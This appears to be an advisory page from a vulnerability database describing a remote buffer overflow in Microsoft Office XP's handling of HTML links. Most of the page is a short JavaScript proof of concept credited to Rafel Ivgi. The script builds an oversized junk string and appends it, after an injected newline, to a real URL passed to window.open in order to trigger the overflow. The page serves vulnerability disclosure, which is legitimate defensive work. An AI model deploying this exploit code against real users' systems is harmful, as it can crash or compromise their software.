Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability

info
discussion
exploit
solution
references

Microsoft Office XP HTML Link Processing Remote Buffer Overflow Vulnerability

The following proof of concept has been supplied by Rafel Ivgi:

<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>